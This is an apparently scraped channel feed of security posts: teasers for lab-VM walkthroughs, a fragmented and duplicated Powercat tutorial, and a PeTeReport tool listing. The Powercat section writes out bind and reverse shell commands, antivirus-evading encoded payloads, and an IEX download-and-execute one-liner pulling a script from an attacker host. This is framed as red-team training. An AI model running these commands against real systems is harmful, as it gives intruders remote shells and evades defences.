Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
G0rmint WalkThrough
https://cdn-images-1.medium.com/max/600/0*JbGJTNYbvZZjczfU.png
Makineyi indirebilirsiniz.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
G0rmint WalkThrough
https://cdn-images-1.medium.com/max/600/0*JbGJTNYbvZZjczfU.png
Makineyi indirebilirsiniz.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
G0rmint WalkThrough
Makineyi indirebilirsiniz.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Makineyi indirebilirsiniz.
https://cdn-images-1.medium.com/max/600/0*0W0wyfFjEbk0KCo8.png
Adımların Genel özeti:
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Makineyi indirebilirsiniz.
https://cdn-images-1.medium.com/max/600/0*0W0wyfFjEbk0KCo8.png
Adımların Genel özeti:
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Scaning
Adımların Genel özeti:
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Bsides-Vancouver2018 Walkthrough
https://cdn-images-1.medium.com/max/600/0*VHClRvILf4EhJW1v.png
Makineyi indirebilirsiniz.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Bsides-Vancouver2018 Walkthrough
https://cdn-images-1.medium.com/max/600/0*VHClRvILf4EhJW1v.png
Makineyi indirebilirsiniz.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bsides-Vancouver2018 Walkthrough
Makineyi indirebilirsiniz.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Billu_B0x Walkthrough
https://cdn-images-1.medium.com/max/600/0*PRMdrM9ZTE7EmJXV.png
Makineyi indirebilirsiniz.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Billu_B0x Walkthrough
https://cdn-images-1.medium.com/max/600/0*PRMdrM9ZTE7EmJXV.png
Makineyi indirebilirsiniz.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Billu_B0x Walkthrough
Makineyi indirebilirsiniz.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Toppo:1 VM Walkthrough
https://cdn-images-1.medium.com/max/600/0*AZa-62h38r7ZSv3Z.png
Makineyi indirebilirsiniz.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Toppo:1 VM Walkthrough
https://cdn-images-1.medium.com/max/600/0*AZa-62h38r7ZSv3Z.png
Makineyi indirebilirsiniz.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Toppo:1 VM Walkthrough
Makineyi indirebilirsiniz.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Basic Pentesting:2 Walkthrough
https://cdn-images-1.medium.com/max/600/0*ZeFSGUjnZBREmtY7.png
Makineyi indirebilirsiniz.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Basic Pentesting:2 Walkthrough
https://cdn-images-1.medium.com/max/600/0*ZeFSGUjnZBREmtY7.png
Makineyi indirebilirsiniz.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Basic Pentesting:2 Walkthrough
Makineyi indirebilirsiniz.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
FourAndSix:2 VM Walkthrough
https://cdn-images-1.medium.com/max/600/0*-EGWjYNI6TYTJlhb.png
Makineyi indirebilirsiniz.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
FourAndSix:2 VM Walkthrough
https://cdn-images-1.medium.com/max/600/0*-EGWjYNI6TYTJlhb.png
Makineyi indirebilirsiniz.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
FourAndSix:2 VM Walkthrough
Makineyi indirebilirsiniz.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Powercat for Pentester
IntroductionPowercat is a simple network utility used to perform low level network communication operations. The tool is an implementation of the well-known netcat in powershell. Traditional anti-viruses are known to allow powercat to execute. The installed size of the utility is 68 KB. The portability and platform-independence of the tool makes it an important arrow in every red teamer’s quiver. In this article, we’ll demonstrate and learn the functionality of this tool. You can download this here.Table of Content· Basic Options in PowercatBasic Options in Powercat-gGenerate Payload-geGenerate Encoded Payload-dDisconnect stream-iInput dataSetting up Powercatpowershell -ep bypass -o powercat.ps1 https://blogger.googleusercontent.com/img/a/AVvXsEjzkXG95vA2Ywgg5SyjXA9-PbORrbYjRQRqET65caR3KOWtyYuK29nCIuVGebF57N752DPLZKRcOtwLEJgL8W3XfwBC1oYzLUGl7dhPDYBn9keR5fxsT6IJNPduQwByPx3fB0chsBaRS6ltepiMPAXBHYzUPYFE4CtEmlzSHezXS31GSrQvcjbzn2v0kA=s16000 Now that we have downloaded the powercat script, we can import it into the current powershell terminal and then it could be used.Import-Module .\powercat.ps1https://blogger.googleusercontent.com/img/a/AVvXsEgvgfawFNdCqKeJNM7FMLwNC5kD976yxhChkrgri0KHQNyYH0xwI_jVqm39QUTNGxOkeYrdYG9LHn_ZsB8LuLZWDFIVkhp2iSFFvbvGPSFa8p5sKAIHUqwCJFAJYZIoJ50XPwk1rSAhnCOnKmKpFBRM3YMAFWcY2uHlFJ98I2aHFsx6mLR-Kst7J3SaoA=s16000 Port Scanning(21,22,80,443) | % {powercat -c 192.168.1.150 -p $_ -t 1 -Verbose -d}Note that here, we have appended port number as a list variable. The client mode (-c flag) specifies the client to scan. As we can observe in the screenshot below that if the port was found to be open, powercat successfully set up a stream with the service. the disconnect option (-d) flag specifies powercat to disconnect the stream as soon as it gets open. Hence, this is how open ports can be discovered using powercat.File TransferFile transfer is possible in powercat by data input in t[...]
___________________________
@hacking_Attack
@Hacking_Video
Powercat for Pentester
IntroductionPowercat is a simple network utility used to perform low level network communication operations. The tool is an implementation of the well-known netcat in powershell. Traditional anti-viruses are known to allow powercat to execute. The installed size of the utility is 68 KB. The portability and platform-independence of the tool makes it an important arrow in every red teamer’s quiver. In this article, we’ll demonstrate and learn the functionality of this tool. You can download this here.Table of Content· Basic Options in PowercatBasic Options in Powercat-gGenerate Payload-geGenerate Encoded Payload-dDisconnect stream-iInput dataSetting up Powercatpowershell -ep bypass -o powercat.ps1 https://blogger.googleusercontent.com/img/a/AVvXsEjzkXG95vA2Ywgg5SyjXA9-PbORrbYjRQRqET65caR3KOWtyYuK29nCIuVGebF57N752DPLZKRcOtwLEJgL8W3XfwBC1oYzLUGl7dhPDYBn9keR5fxsT6IJNPduQwByPx3fB0chsBaRS6ltepiMPAXBHYzUPYFE4CtEmlzSHezXS31GSrQvcjbzn2v0kA=s16000 Now that we have downloaded the powercat script, we can import it into the current powershell terminal and then it could be used.Import-Module .\powercat.ps1https://blogger.googleusercontent.com/img/a/AVvXsEgvgfawFNdCqKeJNM7FMLwNC5kD976yxhChkrgri0KHQNyYH0xwI_jVqm39QUTNGxOkeYrdYG9LHn_ZsB8LuLZWDFIVkhp2iSFFvbvGPSFa8p5sKAIHUqwCJFAJYZIoJ50XPwk1rSAhnCOnKmKpFBRM3YMAFWcY2uHlFJ98I2aHFsx6mLR-Kst7J3SaoA=s16000 Port Scanning(21,22,80,443) | % {powercat -c 192.168.1.150 -p $_ -t 1 -Verbose -d}Note that here, we have appended port number as a list variable. The client mode (-c flag) specifies the client to scan. As we can observe in the screenshot below that if the port was found to be open, powercat successfully set up a stream with the service. the disconnect option (-d) flag specifies powercat to disconnect the stream as soon as it gets open. Hence, this is how open ports can be discovered using powercat.File TransferFile transfer is possible in powercat by data input in t[...]
___________________________
@hacking_Attack
@Hacking_Video
Blogspot
Powercat for Pentester
Hacking Articles is a very interesting blog about information security, penetration testing and vulnerability assessment managed by Raj Chandel.
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles|Raj Chandel's Blog Powercat for Pentester IntroductionPowercat is a simple network utility used to perform low level network communication operations. The tool is an implementation of the well-known netcat in powershell. Traditional anti…
he data stream and fetching it at the client end.nc -lnvp 443 > notes.txt -p 443 -i notes.txtBind Shell Powercat Netcat on Kalinc -lvvp 443 -p 443 -e cmd.exehttps://blogger.googleusercontent.com/img/a/AVvXsEjNU_qRphs627OypFR4n3Aa44idOovfGZrC8sjwHBGHFyhMvwHNvTLfhwMGvRQllq-VreAUeY3kahHddnvUDO7FJ8jkYnPGxfOivwNiwZDgZDLJCrYRQtr0gE9zT3S3lGGTMziL-iVTJ-VPeF4pbMGKQr97Hdkq1gqzxUx99HOa7oWyrHXyLXTDhs69-Q=s16000 And thus, we observe that the “cmd” executable indeed gets executed on the victim’s machine.powercat -l -p 9000 -e cmd -v -p 9000 -v And as you can see, victim’s machine has processed the executable delivered by the attacker.Reverse ShellReverse shell refers to the process in which the attacker machine has a listener running to which the victim connects and then attacker executes code. Here, Windows (powercat) is the attacker machine with listener running on port 443 and Kali running netcat (victim) shall connect to it. This is achieved by running powercat in listener mode:powercat -l -p 443 -e cmdhttps://blogger.googleusercontent.com/img/a/AVvXsEhT7JVCtDvyFeOhYlEpZCjCG80M4lmln5VeaL9gfNMjkD7UySnOhhq4kT1ISZE_rMxVdReNIbDOPUiz7wvbSnb__V9SpqaHBszUoWFJ6MYLPS2r8MGEIGSPxSZnxZG8j[...]
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
he data stream and fetching it at the client end.nc -lnvp 443 > notes.txt -p 443 -i notes.txtBind Shell Powercat Netcat on Kalinc -lvvp 443 -p 443 -e cmd.exehttps://blogger.googleusercontent.com/img/a/AVvXsEjNU_qRphs627OypFR4n3Aa44idOovfGZrC8sjwHBGHFyhMvw…
jxQEGFokC_2_bQJae0L_IdIpO6uG1ac9QLV7yQmgH22r1jkmOxxx3Nyi5c5rA=s16000 As you can see, as soon as we connect to the listener, we get a shellnc 192.168.1.145 443https://blogger.googleusercontent.com/img/a/AVvXsEieW19okCMnGK19qmAIlM7L7Yik9zTFZLBFmKLkpP7EMfUoFbIbzDs6IP_EeOYWJeCoiZ2s1bp60eqxSS0ldkyRMh_0NlXFHp7yb2ZeBdBh3Mf2mj8bsdrrNdyFjcpsH2wltZK766aVMbJVNtkSrc5fh3ABMppyJUO9UKbsaPQ5-g2VfcfKHBzGv1DdyA=s16000 The same can be done with two Windows devices too. Let’s set up a listener on port 9000.powercat -l -p 9000 -e cmd -vhttps://blogger.googleusercontent.com/img/a/AVvXsEgoLx0fMloh5qxDasdbvRVBPNfPhgmiupNeY6x3OHMC3-w0p9kj1N8QqkRmtvQ6Wf-lIs1wVwNR_Lp_WfPpNyZQ7HVA7StJKRn9j1qOnkln9Va4lVKYAtkTdziANTuHSLClaoQW1jAG-1BoxpfLpCsW3xrjrfEtOVpl0vgxA-bgfOiVani5PA621P6jOg=s16000 Now, we’ll use powercat to connect to this listener with the command:powercat -c 192.168.1.145 -p 9000 -v Standalone shellThe option is useful for when a script can be executed in the system. This allows an attacker to code a reverse shell in a “.ps1” file and wait for the script to be executed. Scenario 1: Let’s say a cron job is running that executes a script that has write access. One can copy paste the following command to get reverse shell easily even with no powershell command execution access.powercat -c 192.168.1.3 -p 443 -e cmd.exe -g > shell.ps1https://blogger.googleusercontent.com/img/a/AVvXsEifTWZKtIyUTLCxhjXJ3jmfTavcPIVyjccVUjmy60hP8RlPyJlHRItKJGlNXx7JOgbfRX_T_2h30cMDn9KTnsWT6D46T_pLzPJDTfcKan9_XBydcHjrYOwZk14WMikzsrYma5qZ8NU3zNnrDsYw4UMvsc8Q2AsSYPlLWvN_ED4Ttod3jH3PbmHFDi98Bg=s16000 Make sure the listener is running. We are using Kali as an attacker machine using netcat.nc -lnvp 443 As you can see, there are multiple ways to get an interactive shell on the target machine using netcat.Encoded ShellTo evade traditional security devices like Anti-Virus solutions, we can encode the shell that we used above. Powercat has a good feature to encode a command to Hexadecimal Array. This way, some of the basic security features can be bypassed. This is done by:powercat -c 192.168.1.3 -p 443 -e cmd.exe -ge > encodedshell.ps1 And then the shell can be run by using the Powershell -E option which can execute an encoded string.powershell -E The string is the encoded value from above.___________________________
@hacking_Attack
@Hacking_Video
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
jxQEGFokC_2_bQJae0L_IdIpO6uG1ac9QLV7yQmgH22r1jkmOxxx3Nyi5c5rA=s16000 As you can see, as soon as we connect to the listener, we get a shellnc 192.168.1.145 443https://blogger.googleusercontent.com/img/a/AVvXsEieW19okCMnGK19qmAIlM7L7Yik9zTFZLBFmKLkpP7EMfUoF…
g=s16000 TunnelingTunneling is the most efficient mechanism of maintaining stealth while doing red team operations or even in real life scenarios. Powershell and powercat can help us with tunnelling and hiding our identity next time we conduct red team assessment.Enter-PSSession -ComputerName 192.168.1.45 -Credential rajhttps://blogger.googleusercontent.com/img/a/AVvXsEiPCtxQFxTOpUo-QleufYu-jqmNDjdzY0UIfGDYgjHeXNiKGZTAg0hXatXqc3C2sL3ia3W639JiRlckkyik2EnwIAISpjVQqbNEt_jp2ZqZqAHCvAjV7Vs52mQLGE6p0hEPKNdTRAtwZcpZ88d1IZXQJdAwh36x-xa06XmFo31JPj1kYhG9wY2rTAkqRA=s16000 After we input the credentials, we can see that an interactive powershell session has been spawned.wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1 -o powercat.ps1But before we can run this script, we need to change the execution policy again. Also, upon little searching we found that 192.168.146.129 was alive and responding. Let’s scan this system using powercatSet-ExecutionPolicy -ExecutionPolicy RemoteSigned -p $_ -t 1 -Verbose -d}As you can see, there were three ports open: 21,22,80powercat -lp 9090 -r tcp:192.168.146.129:22 -v As you can see above, tcp traffic from port 22 on 192.168.146.129 is now being relayed by 192.168.146.128 (tunnel) on port 9090. Thus, from an external system, we use PuTTY to connect to the tunnel machine’s 9090 port which will connect us to the victim machine.___________________________
@hacking_Attack
@Hacking_Video
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
g=s16000 TunnelingTunneling is the most efficient mechanism of maintaining stealth while doing red team operations or even in real life scenarios. Powershell and powercat can help us with tunnelling and hiding our identity next time we conduct red team assessment.Enter…
rY5__zpaP6AG3WbzwTWVI6vR4KnvKiVjNbkOC5z3flxxgATTZeIj3OQF2AjKWR-vsGxVOlgeEsFFVuTljH9BqKW6uT0dvMDABWUpYZrXhzb_tpmc1MhwJyTkQ2y7aKidN0qaebYs27Xmwz3nVTo_rkJwhTcN4vRS7qdXmzZQ61dlgfGyg=s16000 We can use powercat to setup relay on port 80 too through which we’ll be able to access the website running on victim.powercat -l -p 9090 -r tcp:192.168.146.129:80 -vAs evident, the victim is now accessible through this tunnel.Powercat One LinerPowercat’s reverse shell exists as a one liner command too. Assume that we have code execution on the victim, we can use powercat’s one liner to get a reverse shell back on the listener running on attacker’s machine. For this process, we need to download powercat in a separate folder and run a web server.wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1 -o powercat.ps1 Now, we’ll set up a listener on port 4444 in attacker (kali) machine immediately. Meanwhile, we have code execution on the target and thus, we’ll use the following powershell/powercat one liner:powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.3/powercat.ps1');powercat -c 192.168.1.3 -p 4444 -e cmd" Soon as we hit enter, we’ll receive a reverse shell on the listener running in Kali.ConclusionHence, we have demonstrated various functionality of powercat in this article. The tool is being readily used in red team assessments and becoming part of major cyber security certification courses. Hope the article helps aspirants/students or analysts to understand the tool in a simple and effective way. Thanks for reading.___________________________
@hacking_Attack
@Hacking_Video
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
PeTeReport - An Open-Source Application Vulnerability Reporting Tool
https://blogger.googleusercontent.com/img/a/AVvXsEgoTnTAwqrPZPzAZvFnZ91yjMj98cOvMNBzmAj2NGiZEYu0rwybc0YOEMQiUnBLSn_fpT2_ypyn8Q9tGhq5W6vZzr0x6PvC3j_6swL_5UTHZtxLCC08A0Q8epWkQIyT6tAa9FgRrnfneHjS52ZJx9F2eCcJF7uhfbtelGKNUNiglBY4Ovj9ctvZU31HKg=w640-h298
PeTeReport (PenTest Report) is an open-source application vulnerability reporting tool designed to assist pentesting/redteaming efforts, by simplifying the task of writting and generation of reports.
Focused in product security, the tool help security researchers and pentesters to provide detailed findings, appendix, attack paths and manage a finding template database to avoid wasting time spent in the reporting phase.
PeTeReport (PenTest Report) is written in Django and Python 3 with the aim to help pentesters to manage a finding repository, write reports (in Markdown) and generate reports in different formats (HTML, CSV, PDF, Jupyter and Markdown).
Documentation
Documentation
Installation and deployment
* Docker
* Django
Features
* Customizable reports output
* Customizable reports templates
* Findings template database
* Possibility to add appendix to findings
* Possibility to add attack trees Deciduous to findings
* HTML Output format
* CSV Output format
* PDF Output format
* Jupyter Notebook Output format
* Markdown Output format
* CVSS 3.1 Score
* Docker installation
* DefectDojo integration
* User management
TODO
* More Output formats
* API
Demo
Demo admin/P3t3r3p0rt
https://blogger.googleusercontent.com/img/a/AVvXsEhbuqrxEy5Dn7anRpEbUtvp6uWpwXYhaKUB7nFOkeDKLd99nIZDM6r3r9NBQi4W2etsbEEKB5T9WwZaQ3KDVoZX9pCOLO7AlrRTVPzNY11ePx6F5Km5467RGS9ZJUoX7keXt_HboS-cTxBwa__tJ7xRLL3-X5JZTk7ArOBQS5IUkAS1xmeTb6QM21_hXA=w640-h318
Sample Reports
* PDF Sample
* HTML Sample
* MD Sample
* CSV Sample
Download Petereport
___________________________
@hacking_Attack
@Hacking_Video
PeTeReport - An Open-Source Application Vulnerability Reporting Tool
https://blogger.googleusercontent.com/img/a/AVvXsEgoTnTAwqrPZPzAZvFnZ91yjMj98cOvMNBzmAj2NGiZEYu0rwybc0YOEMQiUnBLSn_fpT2_ypyn8Q9tGhq5W6vZzr0x6PvC3j_6swL_5UTHZtxLCC08A0Q8epWkQIyT6tAa9FgRrnfneHjS52ZJx9F2eCcJF7uhfbtelGKNUNiglBY4Ovj9ctvZU31HKg=w640-h298
PeTeReport (PenTest Report) is an open-source application vulnerability reporting tool designed to assist pentesting/redteaming efforts, by simplifying the task of writting and generation of reports.
Focused in product security, the tool help security researchers and pentesters to provide detailed findings, appendix, attack paths and manage a finding template database to avoid wasting time spent in the reporting phase.
PeTeReport (PenTest Report) is written in Django and Python 3 with the aim to help pentesters to manage a finding repository, write reports (in Markdown) and generate reports in different formats (HTML, CSV, PDF, Jupyter and Markdown).
Documentation
Documentation
Installation and deployment
* Docker
* Django
Features
* Customizable reports output
* Customizable reports templates
* Findings template database
* Possibility to add appendix to findings
* Possibility to add attack trees Deciduous to findings
* HTML Output format
* CSV Output format
* PDF Output format
* Jupyter Notebook Output format
* Markdown Output format
* CVSS 3.1 Score
* Docker installation
* DefectDojo integration
* User management
TODO
* More Output formats
* API
Demo
Demo admin/P3t3r3p0rt
https://blogger.googleusercontent.com/img/a/AVvXsEhbuqrxEy5Dn7anRpEbUtvp6uWpwXYhaKUB7nFOkeDKLd99nIZDM6r3r9NBQi4W2etsbEEKB5T9WwZaQ3KDVoZX9pCOLO7AlrRTVPzNY11ePx6F5Km5467RGS9ZJUoX7keXt_HboS-cTxBwa__tJ7xRLL3-X5JZTk7ArOBQS5IUkAS1xmeTb6QM21_hXA=w640-h318
Sample Reports
* PDF Sample
* HTML Sample
* MD Sample
* CSV Sample
Download Petereport
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.